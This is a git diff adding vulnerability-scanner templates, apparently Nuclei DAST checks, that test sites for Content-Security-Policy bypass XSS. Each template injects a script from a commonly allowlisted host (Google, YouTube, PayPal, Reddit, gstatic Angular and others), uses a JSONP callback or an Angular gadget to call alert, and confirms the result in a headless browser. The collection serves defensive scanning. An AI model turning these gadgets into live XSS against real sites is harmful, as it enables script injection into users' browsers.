diff --git a/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..7b735dabe0e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-analytics-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Analytics
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google-analytics
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.google-analytics.com/debug/api/vtinfo?gtm_auth=a-0uanYFkML7e3v7Vmxpwg&env_id=env-8&public_id=GTM-TWMCBFD&templates=&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_google_analytics_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_google_analytics_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..1e1c2f12c4b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-recaptcha-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google ReCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.google.com/recaptcha/about/js/main.min.js"></script><img src=x ng-on-error="$event.target.ownerDocument.defaultView.alert(1)">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_google_recaptcha_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_google_recaptcha_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
new file mode 100644
index 00000000000..5a5b7dd148b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-google-search-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Search
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_google_search_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_google_search_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
new file mode 100644
index 00000000000..053304ed5fb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googleapis-blogger-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google APIs Blogger
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,googleapis
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.googleapis.com/blogger/v3/blogs/1/posts/1?callback=alert()"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_googleapis_blogger_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_googleapis_blogger_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
new file mode 100644
index 00000000000..bb1145a3aa3
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googleapis-customsearch-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google APIs Custom Search
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,googleapis
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_googleapis_customsearch_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_googleapis_customsearch_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
new file mode 100644
index 00000000000..87824d5cf1e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-googletagmanager-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Tag Manager
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,googletagmanager
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.googletagmanager.com/debug/api/vtinfo?gtm_auth=a-0uanYFkML7e3v7Vmxpwg&env_id=env-8&public_id=GTM-TWMCBFD&templates=&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_googletagmanager_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_googletagmanager_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
new file mode 100644
index 00000000000..f5ecae7026f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-gstatic-angular-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GStatic Angular
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gstatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="//www.gstatic.com/fsn/angular_js-bundle1.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_gstatic_angular_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_gstatic_angular_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..fa3430b3823
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-gstatic-recaptcha-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GStatic ReCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gstatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.gstatic.com/recaptcha/about/js/main.min.js"></script><img src=x ng-on-error="$event.target.ownerDocument.defaultView.alert(1)">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_gstatic_recaptcha_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_gstatic_recaptcha_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
similarity index 50%
rename from dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml
rename to dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
index c9ac2664e1c..65bdba26478 100644
--- a/dast/vulnerabilities/xss/csp/meteoprog-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
@@ -1,11 +1,11 @@
-id: meteoprog-csp-xss
+id: www-meteoprog-csp-xss
 
 info:
   name: Content-Security-Policy Bypass via Meteoprog
-  author: DhiyaneshDK
-  severity: high
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L193C18-L193C120
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,meteoprog
@@ -25,7 +25,7 @@ http:
         type: replace
         mode: single
         fuzz:
-          - "{{injection}}"
+          - "{{url_encode(injection)}}"
 
     matchers-condition: and
     matchers:
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "meteoprog.ua"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: www_meteoprog_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_meteoprog_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
new file mode 100644
index 00000000000..1c3983f9470
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-microsoft-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Microsoft API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,microsoft
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.microsoft.com/en-us/research/wp-json?_jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_microsoft_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_microsoft_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
new file mode 100644
index 00000000000..18d09a3730a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-paypal-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via PayPal API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,paypal
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.paypal.com/checkoutnow/remembered?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_paypal_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_paypal_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..5413aeeaf52
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-recaptcha-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via ReCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,recaptcha
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.recaptcha.net/recaptcha/api.js?onload=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_recaptcha_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_recaptcha_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
new file mode 100644
index 00000000000..ec114e8d865
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-reddit-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Reddit API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,reddit
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.reddit.com/.json?limit=1&jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_reddit_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_reddit_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
new file mode 100644
index 00000000000..aa997321c6c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-roblox-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Roblox API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,roblox
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.roblox.com/item-thumbnails?params=[{assetId:1}]&jsoncallback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_roblox_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_roblox_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
new file mode 100644
index 00000000000..802a283244f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-st-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via ST
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,st
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://www.st.com/etc/clientlibs/st-search-cx/stangularjs.min.d9f5c8180af41b5cae710870b6b018fe.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_st_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_st_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
new file mode 100644
index 00000000000..22618996e13
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-yastat-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yastat
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yastat
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.yastat.net/s3/milab/js/angular.min.js"></script><div ng-app><input autofocus ng-focus="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_yastat_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_yastat_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
new file mode 100644
index 00000000000..69cd3522fde
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-yastatic-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yastatic
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yastatic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.yastatic.net/s3/milab/js/angular.min.js"></script><div ng-app><input autofocus ng-focus="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_yastatic_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_yastatic_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
new file mode 100644
index 00000000000..471a4bf0dcb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-youtube-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via YouTube API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,youtube
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://www.youtube.com/oembed?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: www_youtube_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "www_youtube_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
new file mode 100644
index 00000000000..0579b7c5379
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: x-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via X API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,x
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.x.com/1/statuses/oembed.json?url=https:%2F%2Ftwitter.com%2FMartina%2Fstatus%2F867710263654580226&callback=alert&_=1496363308445"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: x_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "x_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
new file mode 100644
index 00000000000..b1d89c2432b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yahoo-ads-yap-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yahoo Ads Yap
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yahoo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb=alert();"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: yahoo_ads_yap_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
